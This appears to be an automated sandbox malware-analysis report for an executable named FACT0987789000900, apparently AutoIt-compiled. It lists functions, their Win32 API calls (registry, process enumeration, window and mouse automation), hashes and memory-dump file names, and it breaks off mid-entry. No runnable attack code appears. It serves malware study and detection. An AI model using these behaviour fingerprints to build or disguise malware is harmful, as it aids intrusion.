Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 9dec8d8397eeb1661cb9d7d1b6fd067dd3d8e22991be22a85a5d4e537a069eb6
Instruction ID: 8a6cd1a7f5731e51b8267915da8c9d7ba896a60a0ab92bafdbc709b65e8be73e
Opcode Fuzzy Hash: 9dec8d8397eeb1661cb9d7d1b6fd067dd3d8e22991be22a85a5d4e537a069eb6
Instruction Fuzzy Hash: 3B513AA15047D53DFB324B248C25B77BFA95B06705F08848BE0C5567C3D29CEE84DB6A

Function 004F8FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004F8FE7
GetWindowLongW.USER32(013197D0,000000F0), ref: 004F901A
GetWindowLongW.USER32(013197D0,000000F0), ref: 004F904F
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 004F9081
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004F90AB
GetWindowLongW.USER32(00000000,000000F0), ref: 004F90BC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004F90D6

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: b08a96e237d4c34cf4fc409e0096e4ef791c92ad4bddf40978053855e7dbe0fd
Instruction ID: c9e6a2bcbfb64a979a0b96fbe3a21bcbe1ba0fed65e0cb81dab0243c9dc50d14
Opcode Fuzzy Hash: b08a96e237d4c34cf4fc409e0096e4ef791c92ad4bddf40978053855e7dbe0fd
Instruction Fuzzy Hash: F2313634600218AFDB208F58DC94F6537A5FB5A314F144166F6198F2B1CF75AC44EB59

Function 004D08AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004D08F2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004D0918
SysAllocString.OLEAUT32(00000000), ref: 004D091B
SysAllocString.OLEAUT32(?), ref: 004D0939
SysFreeString.OLEAUT32(?), ref: 004D0942
StringFromGUID2.COMBASE(?,?,00000028), ref: 004D0967
SysAllocString.OLEAUT32(?), ref: 004D0975

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 3670982dec37d5b656c0b93368f1a3ee16b49ef5e59a22f01e3d0b323f2dec48
Instruction ID: 3c773899c6001c1fe96da1d72d3cff1f65064ae04bf9ecc2500242baf7c8e536
Opcode Fuzzy Hash: 3670982dec37d5b656c0b93368f1a3ee16b49ef5e59a22f01e3d0b323f2dec48
Instruction Fuzzy Hash: 8721A676600208BF9B109FA8DC94EEB73BCEB19360B008127F905DB351D6B4EC499768

Function 004D2472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 004D2485
__wcsnicmp.LIBCMT ref: 004D24A6
__wcsnicmp.LIBCMT ref: 004D24C0

Strings

#OnAutoItStartRegister, xrefs: 004D24BA
#notrayicon, xrefs: 004D247D
#requireadmin, xrefs: 004D24A0

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 1644a110155d4de6b1ef635cd8ae0c37b52a6a9f5fc2929c5f0717c92b2b01de
Instruction ID: 544b4609dc9d73db96697692aa43e8f8432abe7815fb0a8bc7f1886fb71050d6
Opcode Fuzzy Hash: 1644a110155d4de6b1ef635cd8ae0c37b52a6a9f5fc2929c5f0717c92b2b01de
Instruction Fuzzy Hash: A721283210452176C321E625AE32EA773A8EF76308F50402FF846A7382E79D994283AD

Function 004D0986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004D09CB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004D09F1
SysAllocString.OLEAUT32(00000000), ref: 004D09F4
SysAllocString.OLEAUT32 ref: 004D0A15
SysFreeString.OLEAUT32 ref: 004D0A1E
StringFromGUID2.COMBASE(?,?,00000028), ref: 004D0A38
SysAllocString.OLEAUT32(?), ref: 004D0A46

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 7fd32a68565bfa1730695512acc09c3559e28cb6e261bf4864e155878aa81796
Instruction ID: 44a6f8088c9e2442a6f623f4cc686e2adcb05951b67e1486cd1951af2ae3c474
Opcode Fuzzy Hash: 7fd32a68565bfa1730695512acc09c3559e28cb6e261bf4864e155878aa81796
Instruction Fuzzy Hash: 3A214475600204AFDB109FA8DC99DAB77ECEF19360B408127F909CB365D6B4EC459768

Function 004FA2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004AD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 004AD1BA
Part of subcall function 004AD17C: GetStockObject.GDI32(00000011), ref: 004AD1CE
Part of subcall function 004AD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 004AD1D8

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 004FA32D
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 004FA33A
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 004FA345
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 004FA354
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 004FA360

Strings

Msctls_Progress32, xrefs: 004FA2FE

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 893c660a5614ab8f2c4e964895a7b93d9e5427e15d5df936caf4dc4f69d4bbb3
Instruction ID: a34321c25d1dfeefdc8a16d3584f5c104cf7993fe7e96146e76f9e4d5d9190ae
Opcode Fuzzy Hash: 893c660a5614ab8f2c4e964895a7b93d9e5427e15d5df936caf4dc4f69d4bbb3
Instruction Fuzzy Hash: BC118EB155021DBEEF115F61CC85EEB7F6DFF09798F014115BA08A60A0C6769C22DBA8

Function 004ACCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 004ACCF6
GetWindowRect.USER32(?,?), ref: 004ACD37
ScreenToClient.USER32(?,?), ref: 004ACD5F
GetClientRect.USER32(?,?), ref: 004ACE8C
GetWindowRect.USER32(?,?), ref: 004ACEA5

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 067b5eef0d48ccb0e030115c17c3f079fdb6f2058e524ea642f4b0208f6d4133
Instruction ID: f996073b1ac1de4e141b21eca3fa091da18452d4727619863b6adeb6a950c2ae
Opcode Fuzzy Hash: 067b5eef0d48ccb0e030115c17c3f079fdb6f2058e524ea642f4b0208f6d4133
Instruction Fuzzy Hash: 20B19D79A00249DBDF50CFA8C5847EEBBB1FF18300F14852AEC59EB250DB34A951CB69

Function 004F1BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 004F1C18
Process32FirstW.KERNEL32(00000000,?), ref: 004F1C26
__wsplitpath.LIBCMT ref: 004F1C54

Part of subcall function 004B1DFC: __wsplitpath_helper.LIBCMT ref: 004B1E3C

_wcscat.LIBCMT ref: 004F1C69
Process32NextW.KERNEL32(00000000,?), ref: 004F1CDF
CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 004F1CF1

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
String ID:
API String ID: 1380811348-0
Opcode ID: 744f98e4db79bbbb9e89c1c63d6903a4d2cc1fa29b517351812d2da2f05f03df
Instruction ID: 5543c6dedbe0613e4e246f47fc55882693c79df7f8b4bc65cbcf99869d03e9b9
Opcode Fuzzy Hash: 744f98e4db79bbbb9e89c1c63d6903a4d2cc1fa29b517351812d2da2f05f03df
Instruction Fuzzy Hash: A451A171504344AFD720EF65C885EABBBECEF88718F00492EF58597251EB74E904CBA6

Function 004F2FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004F3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004F2BB5,?,?), ref: 004F3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004F30AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004F30EF
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 004F3112
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 004F313B
RegCloseKey.ADVAPI32(?,?,00000000), ref: 004F317E
RegCloseKey.ADVAPI32(00000000), ref: 004F318B

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 3451389628-0
Opcode ID: 43230025acef4cbb4fdf10b421b67b64efc39f315b389c1785cc36dc9f361606
Instruction ID: f28af2a7a9b3ae488df3046e998d9d22821d0dd0844b4e1d2272cdee72a39520
Opcode Fuzzy Hash: 43230025acef4cbb4fdf10b421b67b64efc39f315b389c1785cc36dc9f361606
Instruction Fuzzy Hash: FE516C31104304AFCB04EF65C995E6ABBF9FF88304F04492EF64587291DB35EA09CB56

Function 004F84DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 004F8540
GetMenuItemCount.USER32(00000000), ref: 004F8577
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004F859F
GetMenuItemID.USER32(?,?), ref: 004F860E
GetSubMenu.USER32(?,?), ref: 004F861C
PostMessageW.USER32(?,00000111,?,00000000), ref: 004F866D

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 0a9c59e7929ddaaba680501ec25400e14b9212c80e465d8b63f435b385e64129
Instruction ID: e291586cc341d3121d1ff25e25d1149797ee6a024cadab6253dd557abd29c3b1
Opcode Fuzzy Hash: 0a9c59e7929ddaaba680501ec25400e14b9212c80e465d8b63f435b385e64129
Instruction Fuzzy Hash: C151C031A00218AFDF11EF65C945AEEBBF5EF58314F00406EE905BB351CB78AE418B98

Function 004D4AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004D4B10
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004D4B5B
IsMenu.USER32(00000000), ref: 004D4B7B
CreatePopupMenu.USER32 ref: 004D4BAF
GetMenuItemCount.USER32(000000FF), ref: 004D4C0D
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 004D4C3E

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 6f793efc3d3b075fac4905b95c2ea0fdc6770562783b3e1305f0fc36e5e1b51b
Instruction ID: 12792c1e78944372fb3eecc656e5cfdba57db4e3a3f621ea59a7a4c8eb4834cc
Opcode Fuzzy Hash: 6f793efc3d3b075fac4905b95c2ea0fdc6770562783b3e1305f0fc36e5e1b51b
Instruction Fuzzy Hash: BF51F370601209DFCF20CF68C898BAEBBF5AF94718F14811BE4159B390D779D944CB29

Function 004AABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F

BeginPaint.USER32(?,?,?), ref: 004AAC2A
GetWindowRect.USER32(?,?), ref: 004AAC8E
ScreenToClient.USER32(?,?), ref: 004AACAB
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 004AACBC
EndPaint.USER32(?,?,?,?,?), ref: 004AAD06
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0050E673

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
String ID:
API String ID: 2592858361-0
Opcode ID: 5660b525c2a2cd12a4602e99dc97196e934153899cb2468b5f2c21c92a8141e4
Instruction ID: 9f0fb56e2cd0b2996ae08a172769bb28d4f8f7bb65cf8281d91267510682c0df
Opcode Fuzzy Hash: 5660b525c2a2cd12a4602e99dc97196e934153899cb2468b5f2c21c92a8141e4
Instruction Fuzzy Hash: C341B170104300AFD710DF24DC84FBB7BB8EB6A325F14061AF9A5872A1C7359849EB66

Function 004FE397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00551628,00000000,00551628,00000000,00000000,00551628,?,0050DC5D,00000000,?,00000000,00000000,00000000,?,0050DAD1,00000004), ref: 004FE40B
EnableWindow.USER32(00000000,00000000), ref: 004FE42F
ShowWindow.USER32(00551628,00000000), ref: 004FE48F
ShowWindow.USER32(00000000,00000004), ref: 004FE4A1
EnableWindow.USER32(00000000,00000001), ref: 004FE4C5
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 004FE4E8

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: fe320fc4dfa20cf5ccb85f094aaf91fcbe6228eecf3c7fc801d3231991631fd5
Instruction ID: 09b45a1d68aeb14a4e2b85e5200cc5aa32db2bdf543da90749802b09a676c2bf
Opcode Fuzzy Hash: fe320fc4dfa20cf5ccb85f094aaf91fcbe6228eecf3c7fc801d3231991631fd5
Instruction Fuzzy Hash: 15417130601154EFDB21CF2AC499BA57BF1BF05305F1881AEEB588F2B2C735A845DB65

Function 004D98BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 004D98D1

Part of subcall function 004AF4EA: std::exception::exception.LIBCMT ref: 004AF51E
Part of subcall function 004AF4EA: __CxxThrowException@8.LIBCMT ref: 004AF533

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 004D9908
RtlEnterCriticalSection.NTDLL(?), ref: 004D9924
RtlLeaveCriticalSection.NTDLL(?), ref: 004D999E
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004D99B3
InterlockedExchange.KERNEL32(?,000001F6), ref: 004D99D2

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 2537439066-0
Opcode ID: d16c6ebe2586d40d7afab4fc6e73229d21732c83c9b37833a57aa9429bf2c8b3
Instruction ID: 7bc3ce11991a2a5b3fbc6b55783976f3d2d5c43ec63a6b3f598deb931a7a7d70
Opcode Fuzzy Hash: d16c6ebe2586d40d7afab4fc6e73229d21732c83c9b37833a57aa9429bf2c8b3
Instruction Fuzzy Hash: 4F319E71900205ABDB00AFA5DC85AAFBBB8FF55314B1480AAF904EB246D734DE14DBA4

Function 004E9B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,004E77F4,?,?,00000000,00000001), ref: 004E9B53

Part of subcall function 004E6544: GetWindowRect.USER32(?,?), ref: 004E6557

GetDesktopWindow.USER32 ref: 004E9B7D
GetWindowRect.USER32(00000000), ref: 004E9B84
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 004E9BB6

Part of subcall function 004D7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004D7AD0

GetCursorPos.USER32(?), ref: 004E9BE2
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 004E9C44

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: e8dba3ce7e4911af9752d5b501248a3a1a021ce6f1bf0fb8b24f84aa2a027579
Instruction ID: 703c41294a885b74825d585d3b4728b6697209abf6fa758419e432a4215f82fb
Opcode Fuzzy Hash: e8dba3ce7e4911af9752d5b501248a3a1a021ce6f1bf0fb8b24f84aa2a027579
Instruction Fuzzy Hash: 4631EF72104355AFC710DF15D849F9BB7E9FF88314F00091AF595D7281DA34EA08CBA6

Function 004FEBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 004AAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 004AAFE3
